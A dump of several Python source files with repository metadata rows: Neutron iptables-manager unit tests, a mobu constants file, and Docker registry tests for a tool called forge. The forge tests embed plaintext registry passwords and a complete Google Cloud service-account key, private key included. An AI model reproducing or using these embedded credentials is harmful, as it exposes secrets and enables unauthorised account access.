filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True
),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter' % IPTABLES_ARG)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter'
% IPTABLES_ARG)
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_filter_rule(self):
self._test_add_filter_rule_helper(False)
def test_add_filter_rule_with_ipv6(self):
self._test_add_filter_rule_helper(True)
def _test_rule_with_wrap_target_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
name = '0123456789' * 5
wrap = "%s-%s" % (iptables_manager.binary_name,
iptables_manager.get_chain_name(name))
iptables_args = {'bn': iptables_manager.binary_name,
'wrap': wrap}
filter_dump_mod = ('# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(wrap)s - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(wrap)s\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain(name)
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' $%s' % name)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' $%s' % name)
self.iptables.ipv4['filter'].remove_chain(name)
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_rule_with_wrap_target(self):
self._test_rule_with_wrap_target_helper(False)
def test_rule_with_wrap_target_with_ipv6(self):
self._test_rule_with_wrap_target_helper(True)
def _test_add_mangle_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
mangle_dump_mod = (
'# Generated by iptables_manager\n'
'*mangle\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-mangle - [0:0]\n'
':%(bn)s-mark - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A %(bn)s-PREROUTING -j %(bn)s-mark\n'
'[0:0] -A %(bn)s-PREROUTING -j MARK --set-xmark 0x1/0xffffffff\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + mangle_dump_mod +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['mangle'].add_chain('mangle')
self.iptables.ipv4['mangle'].add_rule(
'PREROUTING',
'-j MARK --set-xmark 0x1/0xffffffff')
self.iptables.apply()
self.iptables.ipv4['mangle'].remove_rule(
'PREROUTING',
'-j MARK --set-xmark 0x1/0xffffffff')
self.iptables.ipv4['mangle'].remove_chain('mangle')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_mangle_rule(self):
self._test_add_mangle_rule_helper(False)
def test_add_mangle_rule_with_ipv6(self):
self._test_add_mangle_rule_helper(True)
def _test_add_nat_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
nat_dump = NAT_TEMPLATE % IPTABLES_ARG
nat_dump_mod = ('# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-nat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat\n'
'[0:0] -A %(bn)s-snat -j %(bn)s-float-snat\n'
'[0:0] -A %(bn)s-PREROUTING -d 192.168.0.3 -j '
'%(bn)s-nat\n'
'[0:0] -A %(bn)s-nat -p tcp --dport 8080 -j '
'REDIRECT --to-port 80\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + nat_dump_mod + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + nat_dump + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['nat'].add_chain('nat')
self.iptables.ipv4['nat'].add_rule('PREROUTING',
'-d 192.168.0.3 -j '
'%(bn)s-nat' % IPTABLES_ARG)
self.iptables.ipv4['nat'].add_rule('nat',
'-p tcp --dport 8080' +
' -j REDIRECT --to-port 80')
self.iptables.apply()
self.iptables.ipv4['nat'].remove_rule('nat',
'-p tcp --dport 8080 -j'
' REDIRECT --to-port 80')
self.iptables.ipv4['nat'].remove_rule('PREROUTING',
'-d 192.168.0.3 -j '
'%(bn)s-nat' % IPTABLES_ARG)
self.iptables.ipv4['nat'].remove_chain('nat')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_nat_rule(self):
self._test_add_nat_rule_helper(False)
def test_add_nat_rule_with_ipv6(self):
self._test_add_nat_rule_helper(True)
def _test_add_raw_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
raw_dump_mod = ('# Generated by iptables_manager\n'
'*raw\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-raw - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A %(bn)s-PREROUTING -j CT --notrack\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump_mod + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['raw'].add_chain('raw')
self.iptables.ipv4['raw'].add_rule('PREROUTING',
'-j CT --notrack')
self.iptables.apply()
self.iptables.ipv4['raw'].remove_rule('PREROUTING',
'-j CT --notrack')
self.iptables.ipv4['raw'].remove_chain('raw')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_raw_rule(self):
self._test_add_raw_rule_helper(False)
def test_add_raw_rule_with_ipv6(self):
self._test_add_raw_rule_helper(True)
def test_add_rule_to_a_nonexistent_chain(self):
self.assertRaises(LookupError, self.iptables.ipv4['filter'].add_rule,
'nonexistent', '-j DROP')
def test_remove_nonexistent_chain(self):
with mock.patch.object(iptables_manager, "LOG") as log:
self.iptables.ipv4['filter'].remove_chain('nonexistent')
log.debug.assert_called_once_with(
'Attempted to remove chain %s which does not exist',
'nonexistent')
def test_remove_nonexistent_rule(self):
with mock.patch.object(iptables_manager, "LOG") as log:
self.iptables.ipv4['filter'].remove_rule('nonexistent', '-j DROP')
log.warn.assert_called_once_with(
'Tried to remove rule that was not there: '
'%(chain)r %(rule)r %(wrap)r %(top)r',
{'wrap': True, 'top': False, 'rule': '-j DROP',
'chain': 'nonexistent'})
def test_iptables_failure_with_no_failing_line_number(self):
with mock.patch.object(iptables_manager, "LOG") as log:
# generate Runtime errors on iptables-restore calls
def iptables_restore_failer(*args, **kwargs):
if 'iptables-restore' in args[0]:
self.input_lines = kwargs['process_input'].split('\n')
# don't provide a specific failure message so all lines
# are logged
raise RuntimeError()
return FILTER_DUMP
self.execute.side_effect = iptables_restore_failer
# _apply_synchronized calls iptables-restore so it should raise
# a RuntimeError
self.assertRaises(RuntimeError,
self.iptables._apply_synchronized)
# The RuntimeError should have triggered a log of the input to the
# process that it failed to execute. Verify by comparing the log
# call to the 'process_input' arg given to the failed iptables-restore
# call.
# Failure without a specific line number in the error should cause
# all lines to be logged with numbers.
logged = ['%7d. %s' % (n, l)
for n, l in enumerate(self.input_lines, 1)]
log.error.assert_called_once_with(_(
'IPTablesManager.apply failed to apply the '
'following set of iptables rules:\n%s'),
'\n'.join(logged)
)
def test_iptables_failure_on_specific_line(self):
with mock.patch.object(iptables_manager, "LOG") as log:
# generate Runtime errors on iptables-restore calls
def iptables_restore_failer(*args, **kwargs):
if 'iptables-restore' in args[0]:
self.input_lines = kwargs['process_input'].split('\n')
# pretend line 11 failed
msg = ("Exit code: 1\nStdout: ''\n"
"Stderr: 'iptables-restore: line 11 failed\n'")
raise RuntimeError(msg)
return FILTER_DUMP
self.execute.side_effect = iptables_restore_failer
# _apply_synchronized calls iptables-restore so it should raise
# a RuntimeError
self.assertRaises(RuntimeError,
self.iptables._apply_synchronized)
# The RuntimeError should have triggered a log of the input to the
# process that it failed to execute. Verify by comparing the log
# call to the 'process_input' arg given to the failed iptables-restore
# call.
# Line 11 of the input was marked as failing so lines (11 - context)
# to (11 + context) should be logged
ctx = iptables_manager.IPTABLES_ERROR_LINES_OF_CONTEXT
log_start = max(0, 11 - ctx)
log_end = 11 + ctx
logged = ['%7d. %s' % (n, l)
for n, l in enumerate(self.input_lines[log_start:log_end],
log_start + 1)]
log.error.assert_called_once_with(_(
'IPTablesManager.apply failed to apply the '
'following set of iptables rules:\n%s'),
'\n'.join(logged)
)
def test_get_traffic_counters_chain_notexists(self):
with mock.patch.object(iptables_manager, "LOG") as log:
acc = self.iptables.get_traffic_counters('chain1')
self.assertIsNone(acc)
self.assertEqual(0, self.execute.call_count)
log.warn.assert_called_once_with(
'Attempted to get traffic counters of chain %s which '
'does not exist', 'chain1')
def _test_get_traffic_counters_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
exp_packets = 800
exp_bytes = 131802
expected_calls_and_values = [
(mock.call(['iptables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP),
(mock.call(['iptables', '-t', 'raw', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'mangle', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'nat', '-L', 'OUTPUT', '-n',
'-v', '-x'],
run_as_root=True),
''),
]
if use_ipv6:
expected_calls_and_values.append(
(mock.call(['ip6tables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP))
exp_packets *= 2
exp_bytes *= 2
tools.setup_mock_calls(self.execute, expected_calls_and_values)
acc = self.iptables.get_traffic_counters('OUTPUT')
self.assertEqual(acc['pkts'], exp_packets)
self.assertEqual(acc['bytes'], exp_bytes)
tools.verify_mock_calls(self.execute, expected_calls_and_values,
any_order=True)
def test_get_traffic_counters(self):
self._test_get_traffic_counters_helper(False)
def test_get_traffic_counters_with_ipv6(self):
self._test_get_traffic_counters_helper(True)
def _test_get_traffic_counters_with_zero_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
exp_packets = 800
exp_bytes = 131802
expected_calls_and_values = [
(mock.call(['iptables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x', '-Z'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP),
(mock.call(['iptables', '-t', 'raw', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'mangle', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
''),
(mock.call(['iptables', '-t', 'nat', '-L', 'OUTPUT', '-n',
'-v', '-x', '-Z'],
run_as_root=True),
'')
]
if use_ipv6:
expected_calls_and_values.append(
(mock.call(['ip6tables', '-t', 'filter', '-L', 'OUTPUT',
'-n', '-v', '-x', '-Z'],
run_as_root=True),
TRAFFIC_COUNTERS_DUMP))
exp_packets *= 2
exp_bytes *= 2
tools.setup_mock_calls(self.execute, expected_calls_and_values)
acc = self.iptables.get_traffic_counters('OUTPUT', zero=True)
self.assertEqual(acc['pkts'], exp_packets)
self.assertEqual(acc['bytes'], exp_bytes)
tools.verify_mock_calls(self.execute, expected_calls_and_values,
any_order=True)
def test_get_traffic_counters_with_zero(self):
self._test_get_traffic_counters_with_zero_helper(False)
def test_get_traffic_counters_with_zero_with_ipv6(self):
self._test_get_traffic_counters_with_zero_helper(True)
def _test_find_last_entry(self, find_str):
filter_list = [':neutron-filter-top - [0:0]',
':%(bn)s-FORWARD - [0:0]',
':%(bn)s-INPUT - [0:0]',
':%(bn)s-local - [0:0]',
':%(wrap)s - [0:0]',
':%(bn)s-OUTPUT - [0:0]',
'[0:0] -A FORWARD -j neutron-filter-top',
'[0:0] -A OUTPUT -j neutron-filter-top'
% IPTABLES_ARG]
return self.iptables._find_last_entry(filter_list, find_str)
def test_find_last_entry_old_dup(self):
find_str = 'neutron-filter-top'
match_str = '[0:0] -A OUTPUT -j neutron-filter-top'
ret_str = self._test_find_last_entry(find_str)
self.assertEqual(ret_str, match_str)
def test_find_last_entry_none(self):
find_str = 'neutron-filter-NOTFOUND'
ret_str = self._test_find_last_entry(find_str)
self.assertIsNone(ret_str)
class IptablesManagerStateLessTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesManagerStateLessTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.iptables = (iptables_manager.IptablesManager(state_less=True))
def test_nat_not_found(self):
self.assertNotIn('nat', self.iptables.ipv4)
def test_mangle_not_found(self):
self.assertNotIn('mangle', self.iptables.ipv4)
| 41.182796
| 79
| 0.52281
|
4a145ab964d7061e38fb46e33e5f09c779e5182d
| 327
|
py
|
Python
|
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | null | null | null |
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | 26
|
2021-02-18T03:44:39.000Z
|
2022-03-21T19:34:52.000Z
|
src/mobu/constants.py
|
lsst-sqre/sciencemonkey
|
02638bb883093c4c225251d32d0b01fe79778c2a
|
[
"MIT"
] | null | null | null |
"""Global constants for mobu."""
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
"""Date format to use for dates in Slack alerts."""
NOTEBOOK_REPO_URL = "https://github.com/lsst-sqre/notebook-demo.git"
"""Default notebook repository for NotebookRunner."""
NOTEBOOK_REPO_BRANCH = "prod"
"""Default repository branch for NotebookRunner."""
| 29.727273
| 68
| 0.718654
|
4a145cb78d609b9a2798c7b4e754c3bf9940c26a
| 8,380
|
py
|
Python
|
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
forge/tests/test_docker.py
|
aj0415/cforge
|
a99c6333ffa6b7686c8eb622cbf45a742b002716
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, time
from forge.tasks import sh, TaskError
from forge.docker import Docker, ECRDocker
from .common import mktree
registry = "registry.hub.docker.com"
namespace = "forgeorg"
user = "forgetest"
password = "forgetest"
def test_remote_exists_true():
dr = Docker(registry, namespace, user, password)
assert not dr.remote_exists("nosuchrepo", "nosuchversion")
def test_remote_exists_false():
dr = Docker("registry.hub.docker.com", "datawire", user, password)
assert dr.remote_exists("forge-setup-test", "1")
def test_remote_exists_auth_failed():
dr = Docker(registry, "forgetest", "nosuchuser", "badpassword")
try:
dr.remote_exists("nonexistent", "nosuchversion")
except TaskError, e:
assert ("problem authenticating" in str(e)) or ("unauthorized" in str(e))
def test_validate():
dr = Docker(registry, namespace, user, password)
dr.validate()
def test_gcr():
dr = Docker("gcr.io", "forgetest-project", "_json_key", """
{
"type": "service_account",
"project_id": "forgetest-project",
"private_key_id": "c49f1dd1c0c55418796c510af2cc7f46c4327058",
"private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDymqNXy8GUKSDx\n8/QBPTziiOyZExO1LNa31I5mc+ut4/KPEHzVtCHETpE610utxleUoyt64b9SgYEv\nySEjBJz1Nt36NNM8Pb2/+ju0L6Ha+Cui5iqfKmkHxSbCFIk25s7bh6zWWoQLw3hH\nkK7dSAJ4yeX8/xaExuYOJx9q4mkn7uNuBkIhx/YE17p2NRmuDQR8YxUadz9QgcEL\ntDXb5zBudh1MsLgBK98gZTedDNtlJMHE2zLhIJTPJ7VNwcaPP34OD5W06wcllAjZ\nxmA3eKnl/M8jdLtfrYBituNtQi2UMsNKbAffYWq1XLAvaBMLs+l9Bz4NWCxJJtTB\n0UpGt/BzAgMBAAECggEARNJgdxYKzrySJ4E0nathG8SLFeunAhT7vn+Se/bzi0to\ncnRTbY5hq9477czIn73t93EIcx4aV838N3GfsF7tJdUQSJv2tpavPwg+KqH+kO8o\n9dfEjI2L6RPhKFqKCGSWlwlYmyBnaCzl8KtXJ9f3N4vS7h/xI+6GscogbAJZoWVi\nfODsXZQqO854NwbtsjZj0xBE9ZCEc2MpcXOPn3zYcj5oRP5bNYHd8zsQ6iWGmNnp\n1IloaAFmQDIwijqraGaYHFEATB/2QwXwTjvdr0NVo7tmMkUwJ/wMxxTLgALeddu4\nfuwh1ithkzS8KRK77S/D4PSfpvtUSEu5gkZmslbZ3QKBgQD96FAysHywri/QvElg\nuqhzOmBs2pNmkt9tS5wKSc+oVZ0FlL0qMPomZOZqn2g7Os3p60LMbsriEqn/rvQO\nd3oYjWht2drdqIRPy1R7nVv7/34AYr0SIKJ/W/l3o0FllLN7hJLiJvgxCERyj1Id\na6PWbXYEW8hkbfZi+X5flMSWrwKBgQD0mnom2By5j/SzGg1doMCqb7tCxptF5tFc\nKYBtPORihm34iA77AJK5HBb7Wb4k/WwWXYGOliqRXvQ+MlDcM/iyCvfoHuqz/BWe\nYc+21GKhgbbRJz3XX1uS8UBSaEDmgHLAfXkGLvqtst+ra8MicJ+Ycfc8qNa5wRhy\nTkbwAAKzfQKBgQD0AECxtbDeCUaiDY9miXo/4aWwdgyY0iQsYDDAIlaQqlWPe3Se\nCxsZsnVLmY0M/mHLne4/j2khAFamA3c+P8rxtVLZ3jXaNYuRMxEpCfvPm6N2s2yG\n8x21zqlaM2UxPUmONcUB1/lDBXLhtKFw7HQyKFb1sU5OVO4mByVOrSSOuQKBgQDq\nWNoxPxp+OkrCEXK+wlX0tOmfd3KqTRNGjkiJ4C4bqxnPZGOd3ZW1HhFyrS98dwRI\nhTusJXkRH/03XbOU1YIu6k1LqdtJp3n67VE5pE/+1q0Vw9f+8VBl/xeWHGYZsPTA\nMTZzUy0+n8KllLA23do6Du5Fwqk+/J50XUSfihMMbQKBgH5lRaF14hj1oGckYt3P\nM45hTlW+/wUC1kJGd1gxtdpIMm3RHVGdGl9BGOwJVvAAIigbO8w01279xImcXcCb\nD+XBlvw1pDT3QfFs1t7T+x8blVqoflxsfnQW6eQB5W9arZ9CZBpSzzECppOdus46\n6J1fVJxDL9Nq5ykxjYhDYXY1\n-----END PRIVATE KEY-----\n",
"client_email": "forge-test@forgetest-project.iam.gserviceaccount.com",
"client_id": "106271144892298981142",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://accounts.google.com/o/oauth2/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/forge-test%40forgetest-project.iam.gserviceaccount.com"
}
""")
dr.validate()
START_TIME = time.time()
def test_ecr():
dr = ECRDocker(account='914373874199', region='us-east-1',
aws_access_key_id=os.environ['FORGE_ECR_KEY_ID'],
aws_secret_access_key=os.environ['FORGE_ECR_SECRET_KEY'])
dr.validate()
name = "forge_test_{}".format(START_TIME)
assert not dr.remote_exists(name, "dummy")
dr.validate(name=name)
describe_repos = dr.ecr.get_paginator('describe_repositories')
for response in describe_repos.paginate():
for repo in response['repositories']:
repositoryName=repo['repositoryName']
if repositoryName.startswith('forge_test_'):
dr.ecr.delete_repository(repositoryName=repositoryName, force=True)
DOCKER_SOURCE_TREE = """
@@Dockerfile
FROM alpine:3.5
COPY timestamp.txt .
ENTRYPOINT ["echo"]
CMD ["timstamp.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_build_push():
dr = Docker(registry, namespace, user, password)
directory = mktree(DOCKER_SOURCE_TREE, START_TIME=time.ctime(START_TIME))
name = "dockertest"
version = "t%s" % START_TIME
dr.build(directory, os.path.join(directory, "Dockerfile"), name, version, {})
dr.push(name, version)
assert dr.remote_exists(name, version)
DOCKER_SOURCE_TREE_BAD = """
@@Dockerfile
XXXFROM alpine:3.5
COPY timestamp.txt .
ENTRYPOINT ["echo"]
CMD ["timstamp.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_build_error():
dr = Docker(registry, namespace, user, password)
directory = mktree(DOCKER_SOURCE_TREE_BAD, START_TIME=time.ctime(START_TIME))
name = "dockertestbad"
version = "t%s" % START_TIME
try:
dr.build(directory, os.path.join(directory, "Dockerfile"), name, version, {})
except TaskError, e:
msg = str(e)
assert "command 'docker build" in msg
assert "nknown instruction: XXXFROM" in msg
BUILDER_SOURCE_TREE = """
@@Dockerfile
FROM alpine:3.5
COPY timestamp.txt .
RUN echo original_content > content.txt
ENTRYPOINT ["cat"]
CMD ["content.txt"]
@@
@@timestamp.txt
START_TIME
@@
"""
def test_builder():
dr = Docker(registry, namespace, user, password)
directory = mktree(BUILDER_SOURCE_TREE, START_TIME=str(START_TIME))
name = "buildertest_%s" % START_TIME
version = "t%s" % START_TIME
builder = dr.builder(directory, os.path.join(directory, "Dockerfile"), name, version, {})
try:
# create a builder container based on the Dockerfile
result = builder.run("cat", "timestamp.txt")
assert result.output == str(START_TIME)
# create an image from the builder with no incremental mods
builder.commit(name, version)
# check the image has the correct timestamp and
result = dr.run(name, version, "cat", "timestamp.txt")
assert result.output == str(START_TIME)
# check that the original CMD and ENTRYPOINT are preserved
result = sh("docker", "run", "--rm", "-it", dr.image(name, version))
assert result.output.strip() == "original_content"
# update the timestamp in the builder image
builder.run("/bin/sh", "-c", "echo updated > timestamp.txt")
result = builder.run("cat", "timestamp.txt")
assert result.output.strip() == "updated"
# create a new image from the updated builder
builder.commit(name, version + "_updated")
result = dr.run(name, version + "_updated", "cat", "timestamp.txt")
assert result.output.strip() == "updated"
# check that the original CMD and ENTRYPOINT are preserved in
# the image created from the updated container
result = sh("docker", "run", "--rm", "-it", dr.image(name, version + "_updated"))
assert result.output.strip() == "original_content"
# now let's update the Dockerfile and make sure we launch a new builder
with open(os.path.join(directory, "Dockerfile"), "write") as fd:
fd.write("""FROM alpine:3.5
COPY timestamp.txt .
RUN echo updated_content > content.txt
ENTRYPOINT ["cat"]
CMD ["content.txt"]
""")
builder = dr.builder(directory, os.path.join(directory, "Dockerfile"), name, version, {})
builder.commit(name, version)
# check that the updated CMD and ENTRYPOINT are present
result = sh("docker", "run", "--rm", "-it", dr.image(name, version))
assert result.output.strip() == "updated_content"
finally:
builder.kill()
| 44.105263
| 1,752
| 0.73568
|
4a145df35a900590795fc1f731f7768259f4ef04
| 680
|
py
|
Python
|
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | 7
|
2020-09-15T15:52:53.000Z
|
2021-05-19T17:51:56.000Z
|
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | null | null | null |
Submissions/Tugdual_Sarazin/prime_number.py
|
Kkim-5962/Programming_with_python_2021
|
fe0d32f41ce5b3c13f08337f4e7c0da857195434
|
[
"Apache-2.0"
] | 49
|
2020-09-12T12:56:32.000Z
|
2021-12-30T13:27:38.000Z
|
def prime_numbers(max):
start = 2
end = max + 1
n = [True for i in range(start, end)]
for a in range(start, end):
if n[a - start]:
for b in range(a + 1, end):
# print(a, b, n[b - start], b % a)
if b % a == 0:
n[b - start] = False
nn = []
for i in range(start, end):
if n[i - start]:
nn.append(i)
return nn
assert prime_numbers(10) == [2, 3, 5, 7]
assert prime_numbers(100) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83,
89, 97]
print(prime_numbers(100))
| 26.153846
| 118
| 0.432353
|
4a145dfe81f460cc131bf486bcc7f0471958c2d3
| 1,835
|
py
|
Python
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
0a124365fc14708bca092f68205987885c91212a
|
[
"BSD-3-Clause"
] | 197
|
2019-10-24T19:51:17.000Z
|
2022-01-29T09:23:49.000Z
|
models/test_model.py
|
MHC-F2V-Research/Image-Reconstruction-Ref2
|
